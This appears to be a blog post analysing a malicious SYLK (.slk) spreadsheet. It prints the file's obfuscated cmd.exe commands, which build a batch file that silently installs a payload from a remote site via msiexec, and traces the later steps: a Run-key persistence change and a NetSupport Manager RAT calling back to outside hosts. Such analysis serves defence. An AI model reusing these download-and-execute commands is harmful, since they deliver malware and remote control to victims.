This file didn’t behave normally at all. You could try to dump macros, but nothing would pop up (correction: I did not try olevba.py by @decalage2; this tool did correctly parse the file). Upon opening the document, you see all of these new child cmd.exe processes along with ping? That certainly wasn’t normal.
So I just decided to open it in notepad and see what I could see.
It turns out that even though this opens up in Excel, we can’t treat it as a regular excel spreadsheet at all. This is a .slk file, a.k.a. a SYmbolic LinK file. “It is used to exchange data between applications, specifically spreadsheets.” All of the code you see above are used to display the data when you open the .slk file.
If you scroll down far enough, you see our malicious code.
The lines prefixed with the letter C are used for cell contents. We can see that EXEC (likely means ‘execute’) is used and some commands follow them. Let’s put them together.
"cmD.exe /c EChO|SE^t /p=""@echo off&wmic process call create 'Msie"">%temp%\OyHwU.bat" "cmD.exe /c @echo off&ping 5&EcHo|s^et /p=""xec /ihttp^:^/^/^ahoyassociate"">>%temp%\OyHwU.bat" "cmD.exe /c @echo off&ping 5&ping 5&EcHo|s^et /p=""s.com/contacts.php "">>%temp%\OyHwU.bat" "cmD.exe /c @echo off&ping 5&ping 5&ping 5&EcHo|s^et /p="" ^/q'"">>%temp%\OyHwU.bat&%temp%\OyHwU.bat"
We can see that amongst all of the ping commands, a series of strings get sent to a new .bat file in the %temp% folder and then executed. Investigating the .bat file confirms this. Put the whole string together and we see that Msiexec is used to install (/i) a file from a website (ahoyassociates.com) and do so quietly (/q).
@echo off&wmic process call create 'Msiexec /ihttp^:^/^/^ahoyassociates.com/contacts.php ^/q'
Although contacts.php is downloaded, it is really a .msi file.
Once the .msi file is installed, it dumps a file called file.cab. It is then expanded using this command:
"C:\Windows\System32\expand.exe" -R files.cab -F:* files
files.cab is expanded to a file called safetycheck.exe. There is a great amount of activity after safetycheck.exe is executed. There is a long chain of cmd.exe ending with a powershell command being executed.
Unfortunately, I wasn’t able get a copy from the any.run output of the .ps1 file that is dropped (but it looks like it might be here in this post) , but we can see that it does a couple of things:
- msiexec.exe: Reach out to http[:]//safuuf7774[.]pw/iplog/newg.php?hst=installing_USER-PC
- Reg.exe: \CurrentVersion\Run is modified to automatically start an executable named fonthost.exe.
- fonthost.exe (which got dropped from the powershell command)
- fonthost is the NetSupport Manager RAT
- It reaches out to 18.104.22.168/fakeurl.htm and starts sending encoded traffic back and forth.
- msiexec.exe: Looks like another attempt to reach out to the same URL as above.
So .slk files are not too difficult to analyze. But what comes after them may be far more complicated.
Thanks for reading.